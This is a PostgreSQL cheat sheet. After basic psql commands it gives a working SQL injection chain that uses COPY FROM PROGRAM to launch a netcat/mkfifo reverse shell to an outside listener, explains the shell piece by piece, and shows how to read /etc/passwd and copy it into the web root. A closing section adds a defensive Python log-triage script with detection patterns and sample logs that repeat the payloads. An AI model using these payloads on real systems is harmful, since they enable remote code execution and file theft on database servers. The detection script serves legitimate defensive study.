CheatSheet

Useful PostgreSQL Commands

Quick reference for common PostgreSQL tasks and checks.

PostgreSQL

List Databases

\l

Connect to Database

\c [database_name]

List Tables

\dt

Describe Table

\d [table_name]

List Schemas

\dn

List Users

\du

Version Check

SELECT version();

Identify Current User

SELECT current_user;

List Functions

\df

List Extensions

\dx

Executing a Reverse Shell via SQLi

Create a Table

'+%3b+CREATE+TABLE+shell(output+text)--
  • This creates a table called shell with one column named output of type text; the table has no rows until COPY fills it:
shell

  | output |
  | --- |
  | (no rows yet) |

Start Local Listener

rlwrap nc -nvlp 1234

Execute Shell Command

'%3b+COPY+shell+FROM+PROGRAM+'rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.45.212+1234+>/tmp/f'--
  • The COPY FROM PROGRAM command in PostgreSQL runs a shell command on the database server and reads its output into the table.

PostgreSQL evaluates COPY shell FROM PROGRAM '...':

  • This is a privileged command that tells PostgreSQL to run an external shell command on the database server (not on your client machine). It requires superuser privileges or, since PostgreSQL 11, membership in the pg_execute_server_program role, so auditing which roles hold either is the first defensive check.
  • It expects the command to write output to stdout, which PostgreSQL reads and inserts into the shell table, one row per line. COPY does not return until the spawned program exits, so a running reverse shell shows up as a long-running active COPY statement in pg_stat_activity.

Reverse Shell Explanation

This is a classic reverse shell using a named pipe (/tmp/f) and Netcat (nc).

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f

Command breakdown:

  | Command part | Explanation |
  | --- | --- |
  | rm /tmp/f | Removes any existing file or named pipe at /tmp/f to prevent errors during creation. |
  | mkfifo /tmp/f | Creates a named pipe (FIFO) at /tmp/f. This pipe is used to pass input to the shell. |
  | cat /tmp/f | Reads from the named pipe; this becomes the input to the shell (sh). |
  | /bin/sh -i | Launches an interactive shell, allowing real-time command execution. |
  | 2>&1 | Redirects stderr (file descriptor 2) to stdout (1) so errors are captured with output. |
  | nc 10.0.0.1 1234 | Sends the shell output to a Netcat listener at 10.0.0.1:1234. |
  | > /tmp/f | Takes incoming data from the Netcat connection and writes it into the named pipe, creating a bidirectional loop. |

Execution flow:

  1. Your commands (typed on nc) are written into /tmp/f.
  2. cat /tmp/f feeds input to /bin/sh -i, which executes it.
  3. Shell output (stdout + stderr) returns to your listener at 10.0.0.1:1234.
  4. You now have interactive shell access to the PostgreSQL server, running as the OS user that owns the postgres server process (typically postgres).

Copying Tables into Other Files

Basic Output

COPY (SELECT pg_read_file('/etc/passwd')) TO '/var/www/html/passwd';
  • This reads /etc/passwd on the database server with pg_read_file and writes the result to /var/www/html/passwd. Both paths are on the server, so the postgres OS user needs read access to the source and write access to the destination directory. pg_read_file requires superuser or membership in pg_read_server_files, and COPY ... TO a file requires superuser or membership in pg_write_server_files.

Creating Table and Storing File in Table

CREATE TABLE read_files(output text);
  • This creates a table called read_files with one column named output of type text; it has no rows until something is copied into it:
read_files

  | output |
  | --- |
  | (no rows yet) |
COPY read_files FROM '/etc/passwd';
  • This copies /etc/passwd from the server's filesystem into read_files, one row per line of the file (COPY's default text format treats tabs as column separators and backslashes as escapes, so files containing them may not load cleanly). Like pg_read_file, COPY ... FROM a server file requires superuser or membership in pg_read_server_files.
SELECT * FROM read_files;
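As an added defender-side example (not part of the original cheat sheet), the script below triages log lines for the primitives used in both the reverse-shell section and the file-copy section above: a stacked statement injected through a request parameter, COPY ... FROM PROGRAM, COPY to or from a server file, and pg_read_file. It assumes the web server writes a common-log-format access log and that PostgreSQL runs with log_statement = 'all' so that statements appear in its log; every sample line is constructed for this example, and the function and pattern names are my own.

```python
# Added example (not part of the original cheat sheet): triage web-server and
# PostgreSQL statement logs for the server-side file/command primitives above.
# All sample log lines are constructed; real formats depend on the web server
# and on PostgreSQL's log_line_prefix / log_statement settings.
import re
from urllib.parse import unquote_plus

# Primitives from the cheat sheet, matched against decoded SQL text.
# Case-insensitive; "[^;]*?" keeps each match inside a single statement.
SUSPICIOUS_SQL = {
    "copy_from_program": re.compile(r"\bCOPY\b[^;]*?\bFROM\s+PROGRAM\b", re.I),
    "copy_from_file":    re.compile(r"\bCOPY\b[^;]*?\bFROM\s+'", re.I),
    "copy_to_file":      re.compile(r"\bCOPY\b[^;]*?\bTO\s+'", re.I),
    "pg_read_file":      re.compile(r"\bpg_read_(?:binary_)?file\s*\(", re.I),
    # a quote closed, then ';' and a new statement: stacked query via injection
    "stacked_query":     re.compile(r"'\s*;\s*\w"),
}

ACCESS_REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
PG_STATEMENT = re.compile(r"\bstatement:\s*(.+)$", re.I)


def sql_fragments(line):
    """Pull the text that may contain SQL out of one log line.

    PostgreSQL statement logs already hold decoded SQL; a web access log holds
    the URL-encoded query string, which is decoded the way the application
    would decode it (so '+' becomes a space and %3b becomes ';')."""
    m = PG_STATEMENT.search(line)
    if m:
        return [m.group(1)]
    m = ACCESS_REQUEST.search(line)
    if m and "?" in m.group(1):
        return [unquote_plus(m.group(1).split("?", 1)[1])]
    return []


def classify(line):
    """Sorted names of the primitives found in a single log line."""
    hits = {name for text in sql_fragments(line)
            for name, rx in SUSPICIOUS_SQL.items() if rx.search(text)}
    return sorted(hits)


def triage(lines):
    """(line number, hits) for every line that matched at least one primitive."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            results.append((number, hits))
    return results


# Constructed sample: three access-log lines, then three PostgreSQL log lines.
# Line 3 runs a harmless 'id' through COPY FROM PROGRAM rather than a shell.
SAMPLE_LOGS = r'''
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /items?id=5 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /items?id=1'+%3b+CREATE+TABLE+shell(output+text)-- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /items?id=1'%3b+COPY+shell+FROM+PROGRAM+'id'-- HTTP/1.1" 500 98
2024-01-01 10:00:03 UTC [4242] webapp@appdb LOG:  statement: COPY (SELECT pg_read_file('/etc/passwd')) TO '/var/www/html/passwd'
2024-01-01 10:00:04 UTC [4242] webapp@appdb LOG:  statement: SELECT * FROM items WHERE id = 5
2024-01-01 10:00:05 UTC [4242] webapp@appdb LOG:  statement: COPY read_files FROM '/etc/passwd'
'''.strip().splitlines()

if __name__ == "__main__":
    for number, hits in triage(SAMPLE_LOGS):
        print(f"line {number}: {', '.join(hits)}")
```

Matching the decoded query string rather than the raw request line matters because the payloads on this page only read as SQL once `+` and `%3b` are decoded; on the database side the log already contains plain SQL, which is why the statement log is the more reliable source when log_statement is enabled. A hit on copy_from_program from an application role is worth treating as an incident on its own, since that role should not hold superuser or pg_execute_server_program in the first place.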